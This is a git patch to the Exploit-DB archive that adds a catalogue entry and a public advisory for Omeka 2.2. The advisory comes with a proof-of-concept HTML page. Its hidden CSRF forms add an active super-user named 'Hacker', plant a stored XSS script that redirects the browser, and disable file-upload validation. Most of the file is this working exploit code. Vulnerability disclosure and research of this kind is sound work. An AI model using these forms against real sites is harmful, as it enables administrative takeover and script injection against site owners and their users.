From 36692b23beabe4622ebf69b68fbb78ce5a8a496d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 19 Jul 2014 04:38:16 +0000
Subject: [PATCH] Updated 07_19_2014

---
 files.csv                       |  1 +
 platforms/php/webapps/34100.txt | 83 +++++++++++++++++++++++++++++++++
 2 files changed, 84 insertions(+)
 create mode 100755 platforms/php/webapps/34100.txt
diff --git a/files.csv b/files.csv
index 25d7c5851..3a69e9112 100755
--- a/files.csv
+++ b/files.csv
@@ -30704,3 +30704,4 @@ id,file,description,date,author,platform,type,port
 34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0
 34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
 34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0
+34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80
diff --git a/platforms/php/webapps/34100.txt b/platforms/php/webapps/34100.txt
new file mode 100755
index 000000000..ae95eceee
--- /dev/null
+++ b/platforms/php/webapps/34100.txt
@@ -0,0 +1,83 @@
+?<!--
+
+Omeka 2.2 CSRF And Stored XSS Vulnerability
+
+
+Vendor: Omeka Team (CHNM GMU)
+Product web page: http://www.omeka.org
+Affected version: 2.2
+
+
+Summary: Omeka is a free, flexible, and open source web-publishing
+platform for the display of library, museum, archives, and scholarly
+collections and exhibitions. Its 'five-minute setup' makes launching
+an online exhibition as easy as launching a blog.
+
+Desc: Omeka version 2.2 suffers from a cross-site request forgery and
+a stored xss vulnerability. The application allows users to perform
+certain actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to perform
+certain actions with administrative privileges if a logged-in user
+visits a malicious web site. Input passed to the 'api_key_label' POST
+parameter is not properly sanitised before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a
+user's browser session in context of an affected site.
+
+Tested on: Kali Linux 3.7-trunk-686-pae
+           Apache/2.2.22 (Debian)
+           PHP 5.4.4-13(apache2handler)
+           MySQL 5.5.28
+
+
+Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
+                              @zeroscience
+
+
+Advisory ID: ZSL-2014-5193
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
+
+Vendor: http://omeka.org/blog/2014/07/16/omeka-2-2-1-security-update-released/
+
+
+16.07.2014
+
+-->
+
+
+<html>
+<title>Omeka 2.2 CSRF And Stored XSS Vulnerability</title>
+<body>
+
+<!-- CSRF Add Super User & Activate -->
+<!-- Roles: Super, Admin, Researcher, Contributor -->
+
+<form action="http://192.168.0.105/omeka-2.2/admin/users/add" method="POST">
+<input type="hidden" name="username" value="Hacker" />
+<input type="hidden" name="name" value="CSRF" />
+<input type="hidden" name="email" value="lab@zeroscience.mk" />
+<input type="hidden" name="role" value="super" />
+<input type="hidden" name="active" value="1" />
+<input type="hidden" name="submit" value="Add+User" />
+<input type="submit" value="Add Super User" />
+</form>
+
+
+<!-- CSRF Add Persistent XSS -->
+
+<form action="http://192.168.0.105/omeka-2.2/admin/users/api-keys/1" method="POST">
+<input type="hidden" name="api_key_label" value='<script>location.href="http://www.zeroscience.mk"</script>' />
+<input type="hidden" name="update_api_keys" value="Update+API+Keys" />
+<input type="submit" value="Insert Script" />
+</form>
+
+
+<!-- CSRF Disable File Validation -->
+
+<form action="http://192.168.0.105/omeka-2.2/admin/settings/edit-security" method="POST">
+<input type="hidden" name="disable_default_file_validation" value="1" />
+<input type="hidden" name="submit" value="Save+Changes" />
+<input type="submit" value="Disable File Validation" />
+</form>
+
+</body>
+</html>
